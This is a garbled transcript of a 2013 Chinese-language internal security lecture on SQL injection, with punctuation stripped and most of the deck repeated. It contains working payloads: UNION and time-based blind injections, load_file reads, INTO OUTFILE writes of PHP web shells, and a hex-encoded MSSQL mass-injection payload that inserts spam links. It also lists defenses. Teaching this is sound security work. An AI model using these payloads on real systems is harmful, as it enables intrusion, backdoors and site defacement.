伺服器端攻擊與防禦i
DESCRIPTION
用戶端攻擊與防禦 Hiiir - Taien 內部資安講座 1020307 Taien WangTRANSCRIPT
Taien內部資安講座 IV 伺服器端攻擊與防禦I
20130307 Hiiir Inc
Taien Wanglttaien_wanghiiircomgt
英屬維京群島商時間軸科技股份有限公司新創事業部
1020307 伺服器端攻擊與防禦I - 大綱
bull SQL Injection
ndash 攻擊技巧
bull 判斷是否有弱點
bull 常用函數
bull UNION
bull 繞過跳脫字元
ndash ASCII編碼
ndash 16進位
ndash 雙位元組跳脫技巧
ndash SQL Blind Injection
bull Time-Based Blind SQL Injection
ndash SQL Column Truncation
SQL Injection ndash 簡介
bull Rfp ldquoNT Web Technology Vulnerabilitiesrdquo Phrack 1998
bull 維京百科
ndash SQL攻擊(SQL injection中國大陸稱作SQL注入攻擊)簡稱隱碼
攻擊是發生於應用程式之資料庫層的安全漏洞簡而言之是在輸入
的字串之中夾帶SQL指令在設計不良的程式當中忽略了檢查那麼這
些夾帶進去的指令就會被資料庫伺服器誤認為是正常的SQL指令而執行
因此遭到破壞
SQL Injection - 範例資料庫的資料
SQL Injection - 請試想這段程式碼有什麼問題
SQL Injection攻擊技巧 ndash 簡易嘗試是否有弱點
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=
bull httpwwwhackdemocomgetUserphpid=9999999
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=2
SQL Injection攻擊技巧 ndash 空格與註解
bull 關鍵字大小寫混雜
bull 註解
(23) --
bull 空格
+
URL編碼 用途
09 horizontal tab
0a line feed
0b vertical tab
0c form feed
0d carriage return
20 space
SQL Injection攻擊技巧 - 猜解資料常用函數
函數 功能
LENGTH(str) 返回字串長度
LEFT(strlen) 返回某字串開頭開始的len最左字串
RIGHT(strlen) 返回某字串開頭開始的len最右字串
SUBSTRING(strposlen) 取得某字串的子字串
SUBSTR(strposlen) 為SUBSTRING同義詞
MID(strposlen) 為SUBSTRING同義詞
CHAR(N [USING charset]) 其返回值為一個包含這些整數代碼值的字串
HEX(N_or_S) 如果N或S是一個數字則返回16進位N的字串
ASCII(str) 返回值為字串str的最左邊數值
CONCAT(str1str2) 返回值為所有連接參數產生的字串
NAME_CONST(namevalue) 返回一個定值當月來產生一個結果集合列時NAME_CONST()促使該列使用定義名稱 51後限制僅能使用CONST的變數
hellip
SQL Injection攻擊技巧 - 相關系統函數
函數 功能
LOAD_FILE(file_name) 讀取檔案
INTO OUTFILE varwwwhtmlbackphp 輸出檔案
VERSION() 返回MySQL伺服器版本
DATABASE() 目前使用資料庫名稱
USER() 返回目前MySQL用戶與主機名稱
SYSTEM_USER() 與USER()同義
SESSION_USER() 與USER()同義
SCHEMA() 與DATABASE()同義
CURRENT_USER() 返回當前被驗證的用戶名與主機名組合可能與USER()值有所不同
DATADIR 讀取資料庫路徑
BASEDIR 資料庫安裝路徑
hellip
SQL Injection攻擊技巧 ndash 讀檔注意事項
bull 欲讀取文件必須在伺服器上
bull 必須指定文件完整的路徑
bull 必須有權限讀取並且文件必須完全可讀
bull 欲讀取文件必須小於 max_allowed_packet
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `id` =$id
ndash 沒有引號攻擊範例
bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI
ON+SELECT+1234
ndash 實際執行語法
bull SELECT FROM `member` WHERE `id` =1 AND 1=2
UNION SELECT 1234
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
bull 有弱點的SQL語法有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `name` like $name
bull 沒有引號攻擊範例
bull httpwwwhackdemocomsearchUserphpname=ha
nd1=2unionselect123user()23
bull 實際執行語法
bull SELECT FROM `member` WHERE `name` like
hand1=2unionselect123user()
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
1020307 伺服器端攻擊與防禦I - 大綱
bull SQL Injection
ndash 攻擊技巧
bull 判斷是否有弱點
bull 常用函數
bull UNION
bull 繞過跳脫字元
ndash ASCII編碼
ndash 16進位
ndash 雙位元組跳脫技巧
ndash SQL Blind Injection
bull Time-Based Blind SQL Injection
ndash SQL Column Truncation
SQL Injection ndash 簡介
bull Rfp ldquoNT Web Technology Vulnerabilitiesrdquo Phrack 1998
bull 維京百科
ndash SQL攻擊(SQL injection中國大陸稱作SQL注入攻擊)簡稱隱碼
攻擊是發生於應用程式之資料庫層的安全漏洞簡而言之是在輸入
的字串之中夾帶SQL指令在設計不良的程式當中忽略了檢查那麼這
些夾帶進去的指令就會被資料庫伺服器誤認為是正常的SQL指令而執行
因此遭到破壞
SQL Injection - 範例資料庫的資料
SQL Injection - 請試想這段程式碼有什麼問題
SQL Injection攻擊技巧 ndash 簡易嘗試是否有弱點
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=
bull httpwwwhackdemocomgetUserphpid=9999999
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=2
SQL Injection攻擊技巧 ndash 空格與註解
bull 關鍵字大小寫混雜
bull 註解
(23) --
bull 空格
+
URL編碼 用途
09 horizontal tab
0a line feed
0b vertical tab
0c form feed
0d carriage return
20 space
SQL Injection攻擊技巧 - 猜解資料常用函數
函數 功能
LENGTH(str) 返回字串長度
LEFT(strlen) 返回某字串開頭開始的len最左字串
RIGHT(strlen) 返回某字串開頭開始的len最右字串
SUBSTRING(strposlen) 取得某字串的子字串
SUBSTR(strposlen) 為SUBSTRING同義詞
MID(strposlen) 為SUBSTRING同義詞
CHAR(N [USING charset]) 其返回值為一個包含這些整數代碼值的字串
HEX(N_or_S) 如果N或S是一個數字則返回16進位N的字串
ASCII(str) 返回值為字串str的最左邊數值
CONCAT(str1str2) 返回值為所有連接參數產生的字串
NAME_CONST(namevalue) 返回一個定值當月來產生一個結果集合列時NAME_CONST()促使該列使用定義名稱 51後限制僅能使用CONST的變數
hellip
SQL Injection攻擊技巧 - 相關系統函數
函數 功能
LOAD_FILE(file_name) 讀取檔案
INTO OUTFILE varwwwhtmlbackphp 輸出檔案
VERSION() 返回MySQL伺服器版本
DATABASE() 目前使用資料庫名稱
USER() 返回目前MySQL用戶與主機名稱
SYSTEM_USER() 與USER()同義
SESSION_USER() 與USER()同義
SCHEMA() 與DATABASE()同義
CURRENT_USER() 返回當前被驗證的用戶名與主機名組合可能與USER()值有所不同
DATADIR 讀取資料庫路徑
BASEDIR 資料庫安裝路徑
hellip
SQL Injection攻擊技巧 ndash 讀檔注意事項
bull 欲讀取文件必須在伺服器上
bull 必須指定文件完整的路徑
bull 必須有權限讀取並且文件必須完全可讀
bull 欲讀取文件必須小於 max_allowed_packet
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `id` =$id
ndash 沒有引號攻擊範例
bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI
ON+SELECT+1234
ndash 實際執行語法
bull SELECT FROM `member` WHERE `id` =1 AND 1=2
UNION SELECT 1234
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
bull 有弱點的SQL語法有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `name` like $name
bull 沒有引號攻擊範例
bull httpwwwhackdemocomsearchUserphpname=ha
nd1=2unionselect123user()23
bull 實際執行語法
bull SELECT FROM `member` WHERE `name` like
hand1=2unionselect123user()
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
